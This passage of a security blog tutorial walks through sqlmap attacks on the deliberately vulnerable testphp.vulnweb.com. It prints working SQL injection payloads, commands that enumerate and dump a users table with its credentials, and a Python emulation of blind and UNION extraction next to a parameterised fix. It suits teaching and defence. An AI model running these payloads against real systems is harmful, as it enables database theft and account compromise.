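        "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1 OFFSET 1)"))
    print("first pass:", blind_extract("(SELECT pass FROM users LIMIT 1)"))
    print("safe:", list_products_safe("1 AND 9252=9252"), list_products_safe("1"))
```

    The same payloads against list_products_safe return nothing, because the value is bound as an integer rather than spliced into the statement. That is also why the four techniques sqlmap lists below (boolean-based blind, error-based, time-based blind, UNION) are all the same bug seen through different channels: the fix is the one parameterised query, not filtering individual payloads.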


    We need to know which DBMS the application is running on and the names of the databases it hosts; --dbs asks sqlmap to fingerprint the back end and enumerate them.
    root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
            ___
           __H__
     ___ ___[(]_____ ___ ___  {1.2.10#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [,]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 22:26:01

    [22:26:01] [INFO] resuming back-end DBMS 'mysql' 
    [22:26:02] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: cat (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cat=1 AND 9252=9252

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: cat=1 AND SLEEP(5)

        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
    ---
    [22:26:04] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0
    [22:26:04] [INFO] fetching database names
    available databases [2]:
    [*] acuart
    [*] information_schema

    [22:26:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

    [*] shutting down at 22:26:05

    This collected several pieces of information that should not be exposed: the DBMS is MySQL (>= 5.0), the stack is Nginx with PHP 5.3.10, and two databases were identified, acuart and information_schema (MySQL's built-in metadata schema, present on every server; the application's own data lives in acuart). sqlmap also confirmed four injection types on the cat parameter: boolean-based blind, error-based, time-based blind and a UNION with 11 columns. Note the line "resuming back-end DBMS 'mysql'": this command had already been run once, so sqlmap reused the session stored under /root/.sqlmap/output/testphp.vulnweb.com instead of testing the parameter again; use --flush-session to force a fresh detection and --batch to accept the default answers without prompts.
    Now let's find out how many tables there are and what they are called.
    We'll work with the acuart database for these tests. (The --dbs switch is redundant once -D names the database; the documented option is --tables, and sqlmap's option parser accepts the unambiguous abbreviation --table used below.)
    root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart --table
            ___
           __H__
     ___ ___[,]_____ ___ ___  {1.2.10#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting at 19:00:45
    [19:00:45] [INFO] resuming back-end DBMS 'mysql' 
    [19:00:46] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: cat (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cat=1 AND 9252=9252
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: cat=1 AND SLEEP(5)
        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
    ---
    [19:00:46] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0
    [19:00:46] [INFO] fetching database names
    available databases [2]:
    [*] acuart
    [*] information_schema
    [19:00:46] [INFO] fetching tables for database: 'acuart'
    Database: acuart
    [8 tables]
    +-----------+
    | artists   |
    | carts     |
    | categ     |
    | featured  |
    | guestbook |
    | pictures  |
    | products  |
    | users     |
    +-----------+
    [19:00:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
    [*] shutting down at 19:00:46

    8 tables were identified: artists, carts, categ, featured, guestbook, pictures, products and users.

    Let's look at the columns of the users table.
    root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users --columns
            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.2.10#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [,]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 19:07:36

    [19:07:36] [INFO] resuming back-end DBMS 'mysql'
    [19:07:36] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: cat (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cat=1 AND 9252=9252

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: cat=1 AND SLEEP(5)

        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
    ---
    [19:07:39] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0
    [19:07:39] [INFO] fetching database names
    available databases [2]:
    [*] acuart
    [*] information_schema

    [19:07:39] [INFO] fetching columns for table 'users' in database 'acuart'
    Database: acuart
    Table: users
    [8 columns]
    +---------+--------------+
    | Column | Type |
    +---------+--------------+
    | address | mediumtext |
    | cart | varchar(100) |
    | cc | varchar(100) |
    | email | varchar(100) |
    | name | varchar(100) |
    | pass | varchar(100) |
    | phone | varchar(100) |
    | uname | varchar(100) |
    +---------+--------------+

    [19:07:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

    [*] shutting down at 19:07:39

    8 columns identified, with the following names:
    address, cart, cc, email, name, pass, phone, uname.
    Now let's look at the contents of each column. What we are after is the username and password used to log in to the application: we already know there is a users table and that it holds the uname and pass columns, so those two are the ones that matter.
    root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users -C address,cart,cc,email,name,pass,phone,uname --dump
            ___
           __H__
     ___ ___["]_____ ___ ___  {1.2.10#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [']_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting at 19:16:43
    [19:16:43] [INFO] resuming back-end DBMS 'mysql' 
    [19:16:43] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: cat (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cat=1 AND 9252=9252
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: cat=1 AND SLEEP(5)
        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
    ---
    [19:16:44] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0
    [19:16:44] [INFO] fetching database names
    available databases [2]:
    [*] acuart
    [*] information_schema
    [19:16:44] [INFO] fetching entries of column(s) 'address, cart, cc, email, name, pass, phone, uname' for table 'users' in database 'acuart'
    [19:16:44] [INFO] recognized possible password hashes in column 'cart'
    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
    do you want to crack them via a dictionary-based attack? [Y/n/q]
    [19:19:59] [INFO] using hash method 'md5_generic_passwd'
    what dictionary do you want to use?
    [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    > 
    [19:20:25] [INFO] using default dictionary
    do you want to use common password suffixes? (slow!) [y/N]
    [19:20:34] [INFO] starting dictionary-based cracking (md5_generic_passwd)
    [19:20:34] [INFO] starting 4 processes 
    [19:20:34] [INFO] current status: =-=-=... |
    [19:20:34] [INFO] current status: ;    ... |
    [19:20:34] [INFO] current status: !#%&*... /
    [19:20:34] [INFO] current status: ........ -
    [19:20:51] [INFO] current status: zz836... \
    [19:20:51] [INFO] current status: ZzDxg... |
    [19:20:51] [INFO] current status: zzl57... |
    [19:20:51] [INFO] current status: zzQLx... /
    [19:20:51] [INFO] current status: zzubb... -
    [19:20:51] [INFO] current status: zzz1p... \
    [19:20:51] [INFO] current status: zzzzz... |
    [19:20:52] [WARNING] no clear password(s) found
    Database: acuart
    Table: users
    [1 entry]
    +---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
    | address                                                                                                       | cart                             | cc                       | email                     | name              | pass | phone   | uname |
    +---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
    | LAMMERS IDIOTAS KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK\r\n<script>alert("LAMMER LIXO")</script> | 7dc9c50b4891e22263bca11a0ce717bf | TUDO LAMMER USANDO HAVIJ | TUDO LAMMER USANDO SQLMAP | aaaaaaaaaaaaaaaaa | test | <blank> | test  |
    +---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
    [19:20:52] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
    [19:20:52] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
    [*] shutting down at 19:20:52

    As you can see, the dump returned the single row of the users table, and in it the application's username and password.

    With username "test" and password "test" it is possible to log in to the application at "http://testphp.vulnweb.com/login.php".

    Three things in this output are worth noting. First, sqlmap flagged the cart column as a possible password hash only because its value is 32 hex characters, the shape of an MD5 digest; the dictionary attack found nothing, and the actual credential sits in clear text in the pass column. Second, the other columns hold text left behind by previous visitors of this shared test target, including a stored <script> tag in address, so the dumped values are not the application's original data. Third, the --dbs switch and the explicit -C list are redundant in the second command: -D acuart -T users --dump fetches every column of that table on its own, and adding --batch answers the interactive prompts with their defaults when you want an unattended run.
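The injection sqlmap exploited above, as an added example that is not part of the original post or of sqlmap itself: a self-contained Python emulation of two of the techniques listed in the sqlmap output, boolean-based blind and UNION query, run against an in-memory SQLite stand-in for the acuart database, next to the parameterized query that closes the hole. The products and users tables, their rows, and the listproducts_* function names are constructed for the demo and are assumptions, not data from testphp.vulnweb.com; SQLite replaces MySQL, so the character probes use unicode()/substr() instead of MySQL's ASCII()/SUBSTRING().

```python
# Added example, not code from the original post or from sqlmap: an offline
# emulation of two of the injection techniques sqlmap reported for the
# 'cat' parameter (boolean-based blind and UNION query), plus the
# parameterized query that closes the hole. The tables, rows and column
# names below are constructed for the demo and are assumptions, not data
# from testphp.vulnweb.com; SQLite stands in for MySQL, so the character
# probes use unicode()/substr() instead of MySQL's ASCII()/SUBSTRING().
import sqlite3

SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
CREATE TABLE users (uname TEXT, pass TEXT);
INSERT INTO products VALUES (1, 'Hat', 1), (2, 'Shirt', 1), (3, 'Cup', 2);
INSERT INTO users VALUES ('test', 'test');
"""


def make_db():
    """In-memory database standing in for the 'acuart' MySQL schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def listproducts_vulnerable(conn, cat):
    """Emulates listproducts.php?cat=...: the parameter is concatenated
    straight into the SQL string, which is the whole vulnerability."""
    sql = "SELECT id, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def listproducts_fixed(conn, cat):
    """Hardened version: validate the type, then bind the value as a
    parameter so it can never change the structure of the query."""
    cat_id = int(cat)  # raises ValueError for '1 AND 1=1' and friends
    return conn.execute(
        "SELECT id, name FROM products WHERE cat=?", (cat_id,)
    ).fetchall()


def oracle(conn, condition):
    """Boolean-based blind oracle: cat=1 lists products only while the
    injected condition is true, exactly like sqlmap's 'cat=1 AND 9252=9252'."""
    return len(listproducts_vulnerable(conn, "1 AND (" + condition + ")")) > 0


def blind_extract(conn, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time,
    binary-searching each code point with the oracle (about 7 requests per
    character instead of up to 128)."""
    result = ""
    for pos in range(1, max_len + 1):
        char = f"unicode(substr(({subquery}), {pos}, 1))"
        # Past the end of the string substr() yields '' and unicode('') is
        # NULL, so this probe is never true and extraction stops.
        if not oracle(conn, f"{char} > 0"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"{char} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def find_union_columns(conn, max_cols=16):
    """Number of columns the original SELECT returns: append
    'UNION ALL SELECT NULL, ...' until the database stops complaining
    (sqlmap's 'Generic UNION query (NULL) - N columns')."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            listproducts_vulnerable(conn, f"1 UNION ALL SELECT {nulls}")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_extract(conn, expr):
    """Pull a value out in a single request: a category that matches
    nothing, then a UNION row whose first column is the wanted expression."""
    n = find_union_columns(conn)
    cols = ", ".join([expr] + ["NULL"] * (n - 1))
    rows = listproducts_vulnerable(conn, f"-1 UNION ALL SELECT {cols}")
    return rows[0][0]


if __name__ == "__main__":
    db = make_db()
    target = "SELECT pass FROM users WHERE uname='test'"
    print("blind:", blind_extract(db, target))
    print("union:", union_extract(db, "(" + target + ")"))
    print("fixed:", listproducts_fixed(db, "1"))
```

Run it directly to watch both extraction paths recover the pass value for uname='test' from the vulnerable query, while the fixed query rejects anything that is not an integer. The blind path costs roughly seven requests per character, which is why sqlmap prefers the UNION technique whenever it finds one: the same value comes back in a single response, as in the 11-column UNION payload it reported for this page.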

    Posted by Josué Pedro

    Graduated in Information Systems from Universidade Nove de Julho, postgraduate in Cyber Security from Impacta in partnership with Daryus.

    Has worked in information technology for a long time and creates content for a YouTube channel and social media.

    Has extensive knowledge of technology, social media, digital marketing, SEO, Google AdWords, Google AdSense and Google Master.

    In his spare time he works as a freelancer hunting for vulnerabilities in systems through the "Hacker One" platform.

    He also takes on freelance technology projects through the Workana platform.
